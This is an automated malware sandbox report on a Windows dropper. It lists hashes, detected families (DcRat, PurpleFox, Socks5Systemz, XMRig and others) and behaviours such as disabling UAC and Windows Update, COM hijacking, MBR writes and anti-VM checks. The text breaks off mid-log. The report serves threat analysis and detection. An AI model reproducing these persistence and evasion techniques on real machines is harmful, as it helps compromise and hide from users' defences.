Analysis
-
max time kernel
1801s -
max time network
1807s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system -
submitted
16-01-2024 15:29
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10-20231220-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win11-20231215-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Signatures
-
DcRat 18 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Processes:
resource yara_rule
behavioral3/memory/4312-111-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
behavioral3/memory/4312-113-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
behavioral3/memory/1728-121-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
behavioral3/memory/1728-120-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
behavioral3/memory/1728-122-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
behavioral3/memory/4312-135-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
behavioral3/memory/1728-139-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
behavioral3/memory/3888-143-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
behavioral3/memory/3888-481-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit
-
Detect Socks5Systemz Payload 3 IoCs
Processes:
resource yara_rule
behavioral3/memory/1384-528-0x0000000000AF0000-0x0000000000B92000-memory.dmp family_socks5systemz
behavioral3/memory/1384-531-0x0000000000AF0000-0x0000000000B92000-memory.dmp family_socks5systemz
behavioral3/memory/1384-548-0x0000000000AF0000-0x0000000000B92000-memory.dmp family_socks5systemz
-
Detect ZGRat V1 2 IoCs
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe family_zgrat_v1
-
Gh0st RAT payload 9 IoCs
-
Modifies firewall policy service 2 TTPs 56 IoCs
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exe
description ioc process
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
-
Processes:
InstallSetup2.exe
description ioc process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" InstallSetup2.exe
-
XMRig Miner payload 10 IoCs
-
Enumerates VirtualBox registry keys 2 TTPs 64 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
AUTOKEY.exe
description ioc process
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AUTOKEY.exe
-
Blocklisted process makes network request 2 IoCs
Processes:
schtasks.exe, rundll32.exe
flow pid process
334 2776 schtasks.exe
417 2624 rundll32.exe
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Aztec.exe, updater.exe
description ioc process
File created C:\Windows\System32\drivers\etc\hosts Aztec.exe
File created C:\Windows\System32\drivers\etc\hosts updater.exe
-
Looks for VMWare services registry key. 1 TTPs 27 IoCs
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 30 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
Processes: ama.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Personalized_notepad_with_reminders.lnk | ama.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mode_for_pro_players_for_speed.lnk
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 36 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 11 IoCs
Processes: cxcfHffNmhPEQy61bLBMgSz0.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" | cxcfHffNmhPEQy61bLBMgSz0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" | cxcfHffNmhPEQy61bLBMgSz0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 | cxcfHffNmhPEQy61bLBMgSz0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 | cxcfHffNmhPEQy61bLBMgSz0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 | cxcfHffNmhPEQy61bLBMgSz0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" | cxcfHffNmhPEQy61bLBMgSz0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" | cxcfHffNmhPEQy61bLBMgSz0.exe
Key created | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 | cxcfHffNmhPEQy61bLBMgSz0.exe
Key created | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 | cxcfHffNmhPEQy61bLBMgSz0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" | cxcfHffNmhPEQy61bLBMgSz0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" | cxcfHffNmhPEQy61bLBMgSz0.exe
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe | themida
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to servers other than the configured DNS servers was detected on the DNS port.
Processes:
description | ioc
Destination IP | 91.211.247.248
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 35 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes: ucMKVtG.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | ucMKVtG.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | ucMKVtG.exe
-
Drops desktop.ini file(s) 1 IoCs
Processes: ucMKVtG.exe
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | ucMKVtG.exe
-
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
Processes: csrss.exe
description | ioc | process
File opened for modification | \??\WinMonFS | csrss.exe
-
Maps connected drives based on registry 3 TTPs 54 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes: 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe, 360TS_Setup.exe
description | ioc | process
File opened for modification | \??\PhysicalDrive0 | 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe
File opened for modification | \??\PhysicalDrive0 | 360TS_Setup.exe
-
Drops file in System32 directory 42 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
-
Suspicious use of SetThreadContext 21 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
JYQvDsNLyD1BiHmpCiD5dmqQ.exe AhjRPOGDGfLEDTGgehsebysf.exe
description ioc process
File opened (read-only) \??\VBoxMiniRdrDN JYQvDsNLyD1BiHmpCiD5dmqQ.exe
File opened (read-only) \??\VBoxMiniRdrDN AhjRPOGDGfLEDTGgehsebysf.exe
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 11 IoCs
-
Launches sc.exe 11 IoCs
Sc.exe is a Windows utility to control services on the system.
-
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe pyinstaller
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 28 IoCs
-
NSIS installer 4 IoCs
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe nsis_installer_2
C:\Users\Admin\Pictures\cxcfHffNmhPEQy61bLBMgSz0.exe nsis_installer_1
C:\Users\Admin\Pictures\cxcfHffNmhPEQy61bLBMgSz0.exe nsis_installer_2
-
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 63 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 37 IoCs
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exe
pid process
4524 taskkill.exe
-
Modifies Internet Explorer Protected Mode 1 TTPs 56 IoCs
Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = 
"3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe -
Modifies Internet Explorer Protected Mode Banner 1 TTPs 14 IoCs
Processes:
explorer.exe
description ioc process
Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 24 IoCs
-
Processes:
qhD0Fjd2sS2bPUQL1AQPs2sm.exe
description ioc process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 qhD0Fjd2sS2bPUQL1AQPs2sm.exe
dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e qhD0Fjd2sS2bPUQL1AQPs2sm.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXE
pid process
1360 EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Aztec.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exeGhxyq.exepid process 4608 Aztec.exe 4608 Aztec.exe 3412 powershell.exe 3412 powershell.exe 4608 Aztec.exe 4608 Aztec.exe 4608 Aztec.exe 4608 Aztec.exe 4608 Aztec.exe 4608 Aztec.exe 4828 powershell.exe 4828 powershell.exe 4828 powershell.exe 4608 Aztec.exe 4608 Aztec.exe 3116 powershell.exe 3116 powershell.exe 4344 updater.exe 4344 updater.exe 1500 powershell.exe 1500 powershell.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
Explorer.EXE, aspnet_compiler.exe, explorer.exe
pid process
3352 Explorer.EXE
1076 aspnet_compiler.exe
724 explorer.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process
660
660
-
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exef4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exeschtasks.exeexplorer.exereg.exerundll32.EXE139k3s9mie973k.exe139k3s9mie973k.exehueeirv139k3s9mie973k.exe139k3s9mie973k.exe139k3s9mie973k.exe139k3s9mie973k.exe139k3s9mie973k.exe139k3s9mie973k.exe139k3s9mie973k.exe139k3s9mie973k.exe139k3s9mie973k.exeexplorer.exehueeirvpid process 3872 cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe 3508 f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe 4764 schtasks.exe 4764 schtasks.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 5148 reg.exe 5148 reg.exe 5680 rundll32.EXE 5680 rundll32.EXE 4112 139k3s9mie973k.exe 4112 139k3s9mie973k.exe 1200 139k3s9mie973k.exe 1200 139k3s9mie973k.exe 5956 hueeirv 2664 139k3s9mie973k.exe 2664 139k3s9mie973k.exe 1800 139k3s9mie973k.exe 1800 139k3s9mie973k.exe 3484 139k3s9mie973k.exe 3484 139k3s9mie973k.exe 5216 139k3s9mie973k.exe 5216 139k3s9mie973k.exe 1056 139k3s9mie973k.exe 1056 139k3s9mie973k.exe 5152 139k3s9mie973k.exe 5152 139k3s9mie973k.exe 2500 139k3s9mie973k.exe 2500 139k3s9mie973k.exe 4816 139k3s9mie973k.exe 4816 139k3s9mie973k.exe 920 139k3s9mie973k.exe 920 139k3s9mie973k.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 3396 hueeirv 724 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
4363463463464363463463463.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 4544 4363463463464363463463463.exe Token: SeDebugPrivilege 3412 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeShutdownPrivilege 2268 powercfg.exe Token: SeCreatePagefilePrivilege 2268 powercfg.exe Token: SeShutdownPrivilege 4548 powercfg.exe Token: SeCreatePagefilePrivilege 4548 powercfg.exe Token: SeShutdownPrivilege 2892 powercfg.exe Token: SeCreatePagefilePrivilege 2892 powercfg.exe Token: SeShutdownPrivilege 2160 powercfg.exe Token: SeCreatePagefilePrivilege 2160 powercfg.exe Token: SeIncreaseQuotaPrivilege 4828 powershell.exe Token: SeSecurityPrivilege 4828 powershell.exe Token: SeTakeOwnershipPrivilege 4828 powershell.exe Token: SeLoadDriverPrivilege 4828 powershell.exe Token: SeSystemProfilePrivilege 4828 powershell.exe Token: SeSystemtimePrivilege 4828 powershell.exe Token: SeProfSingleProcessPrivilege 4828 powershell.exe Token: SeIncBasePriorityPrivilege 4828 powershell.exe Token: SeCreatePagefilePrivilege 4828 powershell.exe Token: SeBackupPrivilege 4828 powershell.exe Token: SeRestorePrivilege 4828 powershell.exe Token: SeShutdownPrivilege 4828 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeSystemEnvironmentPrivilege 4828 powershell.exe Token: SeRemoteShutdownPrivilege 4828 powershell.exe Token: SeUndockPrivilege 4828 powershell.exe Token: SeManageVolumePrivilege 4828 powershell.exe Token: 33 4828 powershell.exe Token: 34 4828 powershell.exe Token: 35 4828 powershell.exe Token: 36 4828 powershell.exe Token: SeIncreaseQuotaPrivilege 4828 powershell.exe Token: SeSecurityPrivilege 4828 powershell.exe Token: SeTakeOwnershipPrivilege 4828 powershell.exe Token: SeLoadDriverPrivilege 4828 powershell.exe Token: SeSystemProfilePrivilege 4828 powershell.exe Token: SeSystemtimePrivilege 4828 powershell.exe Token: SeProfSingleProcessPrivilege 4828 powershell.exe Token: 
SeIncBasePriorityPrivilege 4828 powershell.exe Token: SeCreatePagefilePrivilege 4828 powershell.exe Token: SeBackupPrivilege 4828 powershell.exe Token: SeRestorePrivilege 4828 powershell.exe Token: SeShutdownPrivilege 4828 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeSystemEnvironmentPrivilege 4828 powershell.exe Token: SeRemoteShutdownPrivilege 4828 powershell.exe Token: SeUndockPrivilege 4828 powershell.exe Token: SeManageVolumePrivilege 4828 powershell.exe Token: 33 4828 powershell.exe Token: 34 4828 powershell.exe Token: 35 4828 powershell.exe Token: 36 4828 powershell.exe Token: SeIncreaseQuotaPrivilege 4828 powershell.exe Token: SeSecurityPrivilege 4828 powershell.exe Token: SeTakeOwnershipPrivilege 4828 powershell.exe Token: SeLoadDriverPrivilege 4828 powershell.exe Token: SeSystemProfilePrivilege 4828 powershell.exe Token: SeSystemtimePrivilege 4828 powershell.exe Token: SeProfSingleProcessPrivilege 4828 powershell.exe Token: SeIncBasePriorityPrivilege 4828 powershell.exe Token: SeCreatePagefilePrivilege 4828 powershell.exe Token: SeBackupPrivilege 4828 powershell.exe Token: SeRestorePrivilege 4828 powershell.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
Processes:
360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exeiexplore.exeExplorer.EXEAddInProcess.exepid process 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 2400 iexplore.exe 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 5060 AddInProcess.exe 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe, Explorer.EXE
pid process
1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe
1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe
1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe
3352 Explorer.EXE
3352 Explorer.EXE
3352 Explorer.EXE
-
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe, EXCEL.EXE, 360TS_Setup.exe, 360TS_Setup.exe, jxszdjp.exe, iexplore.exe, IEXPLORE.EXE, BroomSetup.exe, AUTOKEY.exe
pid process
4836 %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
1360 EXCEL.EXE
1360 EXCEL.EXE
1360 EXCEL.EXE
1360 EXCEL.EXE
688 360TS_Setup.exe
4976 360TS_Setup.exe
1360 EXCEL.EXE
2156 jxszdjp.exe
2156 jxszdjp.exe
2156 jxszdjp.exe
2400 iexplore.exe
2400 iexplore.exe
3732 IEXPLORE.EXE
3732 IEXPLORE.EXE
3116 BroomSetup.exe
3748 AUTOKEY.exe
3748 AUTOKEY.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.execmd.execmd.exepowershell.exesrr.exeGhxyq.execmd.execmd.exedescription pid process target process PID 4544 wrote to memory of 4608 4544 4363463463464363463463463.exe Aztec.exe PID 4544 wrote to memory of 4608 4544 4363463463464363463463463.exe Aztec.exe PID 2516 wrote to memory of 2280 2516 cmd.exe sc.exe PID 2516 wrote to memory of 2280 2516 cmd.exe sc.exe PID 212 wrote to memory of 2268 212 cmd.exe powercfg.exe PID 212 wrote to memory of 2268 212 cmd.exe powercfg.exe PID 2516 wrote to memory of 3440 2516 cmd.exe sc.exe PID 2516 wrote to memory of 3440 2516 cmd.exe sc.exe PID 212 wrote to memory of 4548 212 cmd.exe powercfg.exe PID 212 wrote to memory of 4548 212 cmd.exe powercfg.exe PID 2516 wrote to memory of 1848 2516 cmd.exe sc.exe PID 2516 wrote to memory of 1848 2516 cmd.exe sc.exe PID 212 wrote to memory of 2892 212 cmd.exe powercfg.exe PID 212 wrote to memory of 2892 212 cmd.exe powercfg.exe PID 2516 wrote to memory of 3888 2516 cmd.exe sc.exe PID 2516 wrote to memory of 3888 2516 cmd.exe sc.exe PID 2516 wrote to memory of 3928 2516 cmd.exe sc.exe PID 2516 wrote to memory of 3928 2516 cmd.exe sc.exe PID 212 wrote to memory of 2160 212 cmd.exe powercfg.exe PID 212 wrote to memory of 2160 212 cmd.exe powercfg.exe PID 2516 wrote to memory of 4540 2516 cmd.exe reg.exe PID 2516 wrote to memory of 4540 2516 cmd.exe reg.exe PID 2516 wrote to memory of 688 2516 cmd.exe reg.exe PID 2516 wrote to memory of 688 2516 cmd.exe reg.exe PID 2516 wrote to memory of 2584 2516 cmd.exe reg.exe PID 2516 wrote to memory of 2584 2516 cmd.exe reg.exe PID 2516 wrote to memory of 3076 2516 cmd.exe reg.exe PID 2516 wrote to memory of 3076 2516 cmd.exe reg.exe PID 2516 wrote to memory of 2948 2516 cmd.exe reg.exe PID 2516 wrote to memory of 2948 2516 